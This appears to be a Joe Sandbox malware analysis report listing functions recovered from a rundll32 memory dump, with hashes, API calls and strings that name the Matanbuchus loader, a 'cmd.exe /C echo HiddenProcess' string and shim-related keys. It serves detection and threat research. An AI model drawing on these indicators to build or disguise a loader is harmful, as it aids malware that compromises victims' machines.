                      • Opcode ID: 52394df3e8e96b1e0caa4ab5f328dff925fd4c8aa04a66a27013b3be6b27d2ae
                      • Instruction ID: 37e014df0d43894c29f03e51c33d2c0107a006b388ae10d1699b9926dd71445c
                      • Opcode Fuzzy Hash: 52394df3e8e96b1e0caa4ab5f328dff925fd4c8aa04a66a27013b3be6b27d2ae
                      • Instruction Fuzzy Hash: 63F0327AA14310DFE700DFA9D541B9D7BE0EF08331F24416AF911DB290DB7589118B54
                      Function 7F3EAA3E Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EnumSystemLocalesW.KERNEL32(7F3EA997,00000001,00000001,?,?,7F3EB202,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F3EAA75
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      • Opcode ID: 8f56f191173e632b41680d97790481b56b04909fef97b154add279c6c902789e
                      • Instruction ID: 368572bfcf059fb92901b587fe9b3f69b66b1627af2afc3fc134ad6eac1ff526
                      • Opcode Fuzzy Hash: 8f56f191173e632b41680d97790481b56b04909fef97b154add279c6c902789e
                      • Instruction Fuzzy Hash: 1EF0E53A3003555BCF059F3AC944A6A7FA5EFC1724B0A449CFE16CF640CA35A843C794
                      Function 7F3E485C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7F3E3948,?,20001004,00000000,00000002,?,?,7F3E2F4A), ref: 7F3E4890
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 5344a289630fe95181b1081f9d55c0f68c6888d2cbac7cee36ad5e473802f206
                      • Instruction ID: ffa6d1dc802dc99970cdc78312c3dab05f612608695fd70ef13e4b084d7d38ac
                      • Opcode Fuzzy Hash: 5344a289630fe95181b1081f9d55c0f68c6888d2cbac7cee36ad5e473802f206
                      • Instruction Fuzzy Hash: CFE01A3A904369BBDB125E71DC08ADE3A6AEF887A1F148125F90565210CB328D219BA5
                      Function 7F36DF4E Relevance: 1.5, APIs: 1, Instructions: 231COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a762ab2d541b76592850a2091cb9bf5444bd3683b9db72abc1938c1d36f4b591
                      • Instruction ID: bd9d7dec4c2ecaae1f14b79dace947e81c553cfaabb9bc989ad9c814b7668d09
                      • Opcode Fuzzy Hash: a762ab2d541b76592850a2091cb9bf5444bd3683b9db72abc1938c1d36f4b591
                      • Instruction Fuzzy Hash: D1B1AE7A904264DBEB04CFAAC4547BEBFF5EF48315F28815EE449A7245D3398994CF20
                      Function 7F3AE570 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aullrem
                      • String ID: N/A
                      • API String ID: 3758378126-2525114547
                      • Opcode ID: a4f5dd88532226ef1b0a961188b0f627ca8bd974646c93f309477e44187b59b4
                      • Instruction ID: 419b9c7eb8b1cc259f4553875cf83cf3aaed47224bd83bd6a8147796b7b171b6
                      • Opcode Fuzzy Hash: a4f5dd88532226ef1b0a961188b0f627ca8bd974646c93f309477e44187b59b4
                      • Instruction Fuzzy Hash: FEB1C374E042589FCB14CFA9C890ADDFBB1FF88304F248199E849AB355D7356A85CF51
                      Function 7F3AB130 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aullrem
                      • String ID: N/A
                      • API String ID: 3758378126-2525114547
                      • Opcode ID: 8328fcf0eb2d0e414477af3155b4bc6cdc0906545a8f3cb59db6414216711883
                      • Instruction ID: d3689c3b769f76ac1d833aafe076ccc3bbe1081823c7ed0101125fed14a140d5
                      • Opcode Fuzzy Hash: 8328fcf0eb2d0e414477af3155b4bc6cdc0906545a8f3cb59db6414216711883
                      • Instruction Fuzzy Hash: 3BB1B374E042589FCB14CFA9C990AEDFBB1FF89304F148199E849AB345D735AA45CF50
                      Function 7F3AC340 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: N/A
                      • API String ID: 0-2525114547
                      • Opcode ID: 8f2a93886ed2a43db0bfb7b87a4a53ae0a7e1004b6ac90a8a97e758008144949
                      • Instruction ID: 88e4626ba0c8c76564e8b01bea87c60786f950b114adc1a68a7d71937583f52a
                      • Opcode Fuzzy Hash: 8f2a93886ed2a43db0bfb7b87a4a53ae0a7e1004b6ac90a8a97e758008144949
                      • Instruction Fuzzy Hash: BBA1BF74E042589FCB19CF99C890AEDFBB2FF89304F208199E849AB355D731AA45CF54
                      Function 7F3A9C60 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: N/A
                      • API String ID: 0-2525114547
                      • Opcode ID: 21b09f4b19abd399dff0f533f30998dcbf374f0323cd60b0835d6cb014add21d
                      • Instruction ID: dc2608dd97509e8c5e5443b4975b268df1dd87421c09323d8dcd3e2ed1426060
                      • Opcode Fuzzy Hash: 21b09f4b19abd399dff0f533f30998dcbf374f0323cd60b0835d6cb014add21d
                      • Instruction Fuzzy Hash: 96A19F74E052589FCB14CF99C990ADDFBB2BF88304F248199E859BB305D731AA45CF50
                      Function 7F354110 Relevance: .8, Instructions: 827COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                      • Instruction ID: c5ce44ed48cc8bbe88e0e003872cca223e55b429bfecbce78614e8796235019f
                      • Opcode Fuzzy Hash: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                      • Instruction Fuzzy Hash: F9A27078E052698FDB69CF68C994BDDBBB1BF89304F2081D9D849A7345D730AA81CF50
                      Function 7F354664 Relevance: .3, Instructions: 335COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                      • Instruction ID: 2d19786ccb31aea1337f88ff21c1798c5e6142649656dfb0d535316b9f5beeec
                      • Opcode Fuzzy Hash: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                      • Instruction Fuzzy Hash: 4D127078E05269CFDB68CF68C994B9DB7B1BF89304F2081D9D849AB355D730AA81CF50
                      Function 7F376B80 Relevance: .2, Instructions: 222COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a7beb13cbbe58724121bd455243be854026cdf05b1426d56739fb02cd937746
                      • Instruction ID: 9e774cd11d7d78cfe16d2491571930d2505586d9b4620a4ee35ec22b3cc8eae5
                      • Opcode Fuzzy Hash: 5a7beb13cbbe58724121bd455243be854026cdf05b1426d56739fb02cd937746
                      • Instruction Fuzzy Hash: 3DB1B0B4D04259DFCB14CFA8C990BEDBBB1BF49314F108299D859AB345DB346A85CFA0
                      Function 7F377A60 Relevance: .2, Instructions: 222COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4585ace88d95637a0801f818110ff86b1d515a472a9196a7ed77ffe6e863a3c5
                      • Instruction ID: 3bac4bac08b3481fa18eaea1050b98fc3077c91c0b742e9c839c4198ecced1d3
                      • Opcode Fuzzy Hash: 4585ace88d95637a0801f818110ff86b1d515a472a9196a7ed77ffe6e863a3c5
                      • Instruction Fuzzy Hash: 4DB1B1B4D04259DFDB14CFA8C890BEDBBB1BF49314F108299D859AB345DB346A85CFA0
                      Function 7F356D10 Relevance: .2, Instructions: 214COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                      • Instruction ID: 49c06545e6744f557816ff93d3cfd66008c1a495107d35443de4ef36968e5708
                      • Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                      • Instruction Fuzzy Hash: 00B18278E01219DFCB14CFA9C590AADFBB1FF88314F248199E859AB355D734AA81CF50
                      Function 7F37757D Relevance: .2, Instructions: 204COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1f72a82287986b5cce1e352c685363dec6d9e3c5723ab4f3bfd3d891890199f
                      • Instruction ID: 3782f9fd9bf5e7472b9324c4a1a6984f3bd16533af3066c98498000e74657ff3
                      • Opcode Fuzzy Hash: c1f72a82287986b5cce1e352c685363dec6d9e3c5723ab4f3bfd3d891890199f
                      • Instruction Fuzzy Hash: AAB1AE74D04269CBCB29CF98C890BDDBBB1BF59304F1081DAD859AB355DB346A85CF60
                      Function 7F3848E0 Relevance: .2, Instructions: 163COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7cdd12bc330d4123ffd9b09e00b4e36ea01463bf964f8e13552c52d09f2987c7
                      • Instruction ID: 658685de7df9ab98fc18d2d4a426fc3d92c74d0fa2c9ac43e0156e7e49ecee90
                      • Opcode Fuzzy Hash: 7cdd12bc330d4123ffd9b09e00b4e36ea01463bf964f8e13552c52d09f2987c7
                      • Instruction Fuzzy Hash: DA81A0B8E05259DFCB14CFA8C490AEDFBB1BF88304F248159D855AB345D739A942CFA4
                      Function 7F3D699D Relevance: .2, Instructions: 158COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 84d4703a9a033a7564853d5c61bc572df46391f40fa5a72f43ea8dc39d98c1da
                      • Instruction ID: 51fa224fbb45ce46246f88c362c42644a555a2d745910a1f4e817a9e6f693111
                      • Opcode Fuzzy Hash: 84d4703a9a033a7564853d5c61bc572df46391f40fa5a72f43ea8dc39d98c1da
                      • Instruction Fuzzy Hash: 53518572E00219EFDF05CFA9C940AEEBBB6EF88314F15805DE955AB201C734AA51CB90
                      Function 7F356B00 Relevance: .2, Instructions: 156COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                      • Instruction ID: 563a8da9e454a426b6710392ebe2dd9ccde765c70a672e3f8a4a1541b5751205
                      • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                      • Instruction Fuzzy Hash: AA8190B8E04219DFCB04CFA9C590AEDBBB1FF88304F20815AD855AB345D734AA45CF94
                      Function 7F356DAA Relevance: .1, Instructions: 146COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                      • Instruction ID: 35bf51c999081f76bfc6b0a0b0613c451246ab103a28dae56b9eb1652a97eb50
                      • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                      • Instruction Fuzzy Hash: A5718074E01218CFCB18CFA9C590AEDFBB2BF88314F248199E859A7355D734AA81CF50
                      Function 7F37C230 Relevance: .1, Instructions: 138COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c80045f5de9997a08fdda9e23be86fb87cea318497c06c4a9cd6b5ac60e4872
                      • Instruction ID: 846781167557f69b452cc626334213624b57e1ac2ae0873680b6fcb7a6f98716
                      • Opcode Fuzzy Hash: 2c80045f5de9997a08fdda9e23be86fb87cea318497c06c4a9cd6b5ac60e4872
                      • Instruction Fuzzy Hash: B0618D78E04249DFDB14CFA9C490AEDFBB2BF88314F24825AD819AB355D734AA41CF50
                      Function 7F394B90 Relevance: .1, Instructions: 134COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 43281050f515ea04ca4e0651e26a397198951379881a61854fcf9effb9dbb246
                      • Instruction ID: 4e5a605c2932c2a406c518812baff42a8e35efdc56b1a3836046f94ab90a235a
                      • Opcode Fuzzy Hash: 43281050f515ea04ca4e0651e26a397198951379881a61854fcf9effb9dbb246
                      • Instruction Fuzzy Hash: A86190B8E05259DFDB04CFA8C490AEEFBB5BF48304F24815AD855AB345D731AA42CF94
                      Function 7F3D2390 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 73b8d1bc9eb8946c1e666b74be4bfe99b56d8df44118d794e4a9c6e33a64c41b
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 5C11EB7724425143D306893ED8F0EEBA7BAFBC5221B6943BAF4434B658D123F1459600
                      Function 7F3E7EBB Relevance: .0, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 23cf0d7a367885c98e18741b5e74469fa0ab778055ddd41728a043bd79a3c9eb
                      • Instruction ID: 05ab23fd342d776e07706f1b9ac271fc48d339708d65b32f288605ad99dd726c
                      • Opcode Fuzzy Hash: 23cf0d7a367885c98e18741b5e74469fa0ab778055ddd41728a043bd79a3c9eb
                      • Instruction Fuzzy Hash: 87F090326742309BC713CA6CC608FD972ADEF49B11F110156E612DB394D2B1EE0287C0
                      Function 7F3CFA90 Relevance: .0, Instructions: 39COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd0aca94d3a0a2e348fae6700d8760e26fb6588593016fa1aa0b89d09257d6d0
                      • Instruction ID: b9aec6ae184ea33453b5577d2d21db12f75ce764d1e7f324c99f052cf6aa11e4
                      • Opcode Fuzzy Hash: cd0aca94d3a0a2e348fae6700d8760e26fb6588593016fa1aa0b89d09257d6d0
                      • Instruction Fuzzy Hash: 2FF03136900319ABDF61DA78CC54E86F3BCEF40254F110661E5A5A7195EB70FE45CEA0
                      Function 7F3E7E46 Relevance: .0, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d3a199b8eddb4880363c314101c561dca181448b716faaff1b83946f97c38bff
                      • Instruction ID: 198c0f61fd24f1f44efabbf9b2dfa06d33ca57a56065c1aa902becffd4052495
                      • Opcode Fuzzy Hash: d3a199b8eddb4880363c314101c561dca181448b716faaff1b83946f97c38bff
                      • Instruction Fuzzy Hash: 3CF03032A21334EBDB12DB5CC505A8973BDEF89B51F114096F556DB250C6B4ED00C7C0
                      Function 7F377DB0 Relevance: .0, Instructions: 11COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                      • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                      • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                      • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                      Function 7F3AE380 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                      • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                      • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                      • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                      Function 7F33C660 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv__aullrem
                      • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                      • API String ID: 3839614884-178659603
                      • Opcode ID: 1479719429c448d7f36a0a22b0cae36674d047b903dcaed469b44792120b88fd
                      • Instruction ID: c79e6aa8b287efc806f2a380c8c178e1b792544a36ea8b8d2d7daabfe3945d90
                      • Opcode Fuzzy Hash: 1479719429c448d7f36a0a22b0cae36674d047b903dcaed469b44792120b88fd
                      • Instruction Fuzzy Hash: 2CE1AF78E01219DFDB14CFA8C981B9DBBB1BF88344F2081AAD919AB354D7346A85CF54
                      Function 6D08F210 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 258stringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ActiveLastPopuplstrlen
                      • String ID: <$D$MATCHING_SDB_CAPAB$X$]j$cmd.exe /C echo HiddenProcess$|
                      • API String ID: 1743666984-3420354877
                      • Opcode ID: c0c233db12286b8a89b61c47b4075d657a10c685ed18ffb983ea6bdd3e917307
                      • Instruction ID: e0bdf20ab265fa7f27d902f7a47c58469db87c3ac7e684fd239b0fb3a1ed176b
                      • Opcode Fuzzy Hash: c0c233db12286b8a89b61c47b4075d657a10c685ed18ffb983ea6bdd3e917307
                      • Instruction Fuzzy Hash: 47D124B4905258CBDF24CFA9C8847ADBBB5FF8A310F10819AE848A7391D7745A80CF56
                      Function 6D090B50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 177COMMON
                      Download Yara Rule
                      APIs
                      • GetUserDefaultLangID.KERNEL32 ref: 6D090D61
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLangUser
                      • String ID: 5$<$Software\MyApp\TempKey$X$]j$|
                      • API String ID: 768647712-2233507234
                      • Opcode ID: 16b69dcb81890ab1e65b83ff5862f4505f0c87b587f23717f3f0ee6efc51821a
                      • Instruction ID: 7360120ba36b0d6ab534e554498764115f35b486b6f2fbb8493610fe30953fca
                      • Opcode Fuzzy Hash: 16b69dcb81890ab1e65b83ff5862f4505f0c87b587f23717f3f0ee6efc51821a
                      • Instruction Fuzzy Hash: B991F374D06368CBEB24CFA9C840B9DBBB5FF4A704F10819AE908A7391D3741A85CF56
                      Function 7F3F0A93 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7F3F03FF), ref: 7F3F0AAC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 082881fae31d1f2e8ca9efff1df7ad96a6a880bf707eaeb888c5f1c063c257b4
                      • Instruction ID: c7a9b411564f4a988f16078b79ece90450963770e85a5f9862ea3acdd19b374d
                      • Opcode Fuzzy Hash: 082881fae31d1f2e8ca9efff1df7ad96a6a880bf707eaeb888c5f1c063c257b4
                      • Instruction Fuzzy Hash: D15169B990061ACBCB018FADD9885EDBFF8FF45314F904149EC83AF258C7759A258B54
                      Function 7F362512 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 427COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(comdlg32), ref: 7F3627FC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: HandleModule
                      • String ID: 4A$APPLY_ALL_SHIMS$P$comdlg32
                      • API String ID: 4139908857-658474614
